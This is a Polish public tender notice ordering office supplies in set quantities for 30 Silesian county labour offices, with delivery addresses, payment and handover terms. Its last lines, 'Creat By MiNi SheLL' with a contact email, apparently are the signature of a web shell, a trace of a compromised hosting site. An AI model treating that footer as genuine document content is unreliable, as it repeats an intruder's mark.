Przedmiotem zamówienia w części II jest dostawa materiałów biurowych dla Partnerów (PUP) projektu Kierunek przedsiębiorczość w 30 zakresach.


Bloczek samoprzylepny 76 mm x 76 mm -1171 szt., Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm, długość linii pisania ponad 3000 m-1259 szt., Wkład do długopisu opisanego w poz. 2-1234 szt., Długopis żelowy z wymiennym wkładem niebieski, czarny, czerwony o grubości linii 0,3 mm -1123 szt., Wkład do długopisu żelowego z poz. 4 -1550 szt., Długopis samoprzylepny na sprężynce z wymiennym wkładem-354 szt., Dziurkacz z ogranicznikiem formatu z plastikową antypoślizgową nasadką, pojemnik na ścinki , min. 40 kartek-191 szt, Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm-316 szt., Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm z drukarką-1 szt., Klip do papieru   32 mm- 1627 szt., Koperta C5 biała samoprzylepna pakowana po 10 szt. w opakowaniu-1286 op., Korektor w płynie ekologiczny z gąbką-244 szt., Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic-231 op., Nożyczki wykonane z nierdzewnej stali  20 cm z gumowym uchwytem-143 szt., Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161-1550 ryz, Przekładki do dokumentów z kolorowego polipropylenu formatu A4, pakowane po 10 kart-378 op., Przybornik na biurko - walec dymny-205 szt., Rozszywacz do dokumentów-179 szt., Segregator A4/50 kolor z mechanizmem dźwigniowym-1019 szt., Skoroszyt  wielooczkowy  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu-213 op., Spinacze plikowe pakowane po 100 szt. w opakowaniu-295 op., Szuflada na dokumenty pozioma - dymna-424 szt., Taśma klejąca 24x20 mm  pakowana po 6 szt.-112 op., Teczka do podpisu zawierająca co najmniej 15 kartek-186 szt., Teczka z gumka  A4 - kolorowa , lakierowana-1188 szt., Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem (różne kolory)-789 szt., zszywacz  o metalowej konstrukcji z uchwytem z niełamliwe plastiku, zszywający jednorazowo min. 25 kartek o głęb. zszywania 60 mm-206 szt., zszywki do zszywacza opisanego w pkt. 26 pakowane po 1000 szt.-630 op., ołówek techniczny HB -68 szt., notatnik 50kartkowy A5 grzbiet klejony w kratkę -139 szt., segregator A4/75 kolor z mechanizmem dźwigowym -101 szt., zakładki indeksujące co najmniej 4 kolory neonowe -36 szt., Skoroszyt tekturowy biały zwykły (pełny) pakowany po 50 szt.-14 op., Skoroszyt tekturowy biały zwykły zawieszany cały  pakowany po 50 szt.-15 op., gumka z tworzywa sztucznego przeznaczona do ścierania ołówka-28 szt., ołówek automatyczny z gumką 0,7 minka korpus transparentny, ergonomiczny uchwyt-100 szt., ofertówka standardowa A4 L twarda bezbarwna pakowana po 25 szt.-2 op., płyty CD - R 700 MB standard w kopertach-100 szt., płyty DVD + R w kopertach-60 szt., Teczki wiązane białe kartonowe format A4 - opakowania po 50 szt.-9 op., papier kserograficzny kolorowy - MIX 5 kolorów gramatura: 70 - 90 gm2 w ryzie 250 arkuszy-1 op., zeszyt w kratkę 96K A4 w twardej oprawie-3 szt., teczka segregująca z przekładkami - 12 przegródek-5 szt., korektor myszka (taśma) -15 szt., datownik -4 szt., klej w sztyfcie-10 szt., mechanizm skoroszytowy z metalową blaszką z możliwością wpięcia do segregatora, 150 x 38 mm, pakowane po 25 szt.-10 op., identyfikator z klipsem i agrafką -20 szt., Biuwar  z  kalendarzem  na 2014 r. o wym.  600 mm x 400 mm 30 kartkowy, sklejony wzdłuż dolnej krawędzi-5 szt., magnesy do tablicy -24 szt., pendrive min. 4GB -10 szt., koperta C4 biała samoprzylepna z rozszerzonym bokiem i dnem-100 szt., koperty aktowe C4 zaklejane na krótkim boku samoklejące białe pakowane 250 szt.-2 op., koperta A4 biała samoprzylepna pakowana po 10 szt. w opakowaniu-2 op., Etykiety samoprzylepne format A4 (105mmx74mm +- 10% ) po 100 kartek-1 op., Etykiety samoprzylepne format A4 (70mmx35mm +- 10% ) po 100 kartek-1 op.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy od poniedziałku do piątku w godz. 8.00 -14.00 do pomieszczeń wskazanych w dniu dostawy w siedzibie poszczególnego PUP, zgodnie z opisem i zakresem zawartym w Rozdziale II SIWZ - część II:

1)	Zakres I - Powiatowy Urząd Pracy w Będzinie, ul. Ignacego Krasickiego 17A;
2)	Zakres II - Powiatowy Urząd Pracy w Bielsku-Białej, ul. Partyzantów 55;
3)	Zakres III - Powiatowy Urząd Pracy w Bytomiu, ul. Łagiewnicka 15;
4)	Zakres IV - Powiatowy Urząd Pracy w Chorzowie, ul. Opolska 19;
5)	Zakres V - Powiatowy Urząd Pracy w Cieszynie, Plac Wolności 6;
6)	Zakres VI - Powiatowy Urząd Pracy w Częstochowie, ul. Szymanowskiego 15;
7)	Zakres VII - Powiatowy Urząd Pracy w Dąbrowie Górniczej, ul. Sobieskiego 12;
8)	Zakres VIII - Powiatowy Urząd Pracy w Gliwicach, Plac Inwalidów Wojennych 12;
9)	Zakres IX - Powiatowy Urząd Pracy w Jastrzębiu - Zdroju, ul. Pszczyńska 134;
10)	Zakres X - Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9 b;
11)	Zakres XI - Powiatowy Urząd Pracy w Katowicach, ul. Pośpiecha 14;
12)	Zakres XII - Powiatowy Urząd Pracy w Kłobucku, ul. Długosza 114;
13)	Zakres XIII - Powiatowy Urząd Pracy w Lublińcu, ul. Sobieskiego 9;
14)	Zakres XIV - Powiatowy Urząd Pracy w Mikołowie, ul. Chopina 8;
15)	Zakres XV - Powiatowy Urząd Pracy w Myszkowie, ul. Partyzantów 21;
16)	Zakres XVI - Powiatowy Urząd Pracy w Piekarach Śląskich, ul. Ks. Popiełuszki 14;
17)	Zakres XVII - Powiatowy Urząd Pracy w Pszczynie, ul. Dworcowa 23;
18)	Zakres XVIII - Powiatowy Urząd Pracy w Raciborzu, ul. Klasztorna 6;
19)	Zakres XIX - Powiatowy Urząd Pracy w Rudzie Śląskiej, ul. Ballestremów 16;
20)	Zakres XX - Powiatowy Urząd Pracy w Rybniku, ul. Jankowicka 3;
21)	Zakres XXI - Powiatowy Urząd Pracy w Siemianowicach Śląskich, ul. Wyzwolenia 17;
22)	Zakres XXII - Powiatowy Urząd Pracy w Sosnowcu, ul. Rzeźnicza 12;
23)	Zakres XXIII - Powiatowy Urząd Pracy w Świętochłowicach, ul. Plebiscytowa 3;
24)	Zakres XXIV - Powiatowy Urząd Pracy w Tarnowskich Górach, ul. Towarowa 1;
25)	Zakres XXV - Powiatowy Urząd Pracy w Tychach, ul. Budowlanych 59;
26)	Zakres XXVI - Powiatowy Urząd Pracy w Wodzisławiu Śląskim, ul. Michalskiego 12;
27)	Zakres XXVII - Powiatowy Urząd Pracy w Zabrzu, ul. Roosevelta 40 a;
28)	Zakres XXVIII - Powiatowy Urząd Pracy w Zawierciu, ul. 11 Listopada 2 a;
29)	Zakres XXIX - Powiatowy Urząd Pracy w Żorach, ul. Osińska 48;
30)	Zakres XXX - Powiatowy Urząd Pracy w Żywcu, ul. Łączna 28;



UWAGI OGÓLNE:
Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego do każdego z zakresów zamówienia w 3 egzemplarzach (egzemplarz dla Wykonawcy, poszczególnego PUP oraz dla WUP).

Podstawą zapłaty będzie przedstawienie faktury wraz z podpisanymi protokołami zdawczo -odbiorczymi (30 protokołów z każdego zakresu zamówienia 1 szt.).W dniu zawarcia umowy Zamawiający przekaże Wykonawcy wykaz osób (do każdego zakresu zamówienia) upoważnionych do odbioru materiałów biurowych, sprawdzenia zgodności towaru z zamawianym towarem, podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com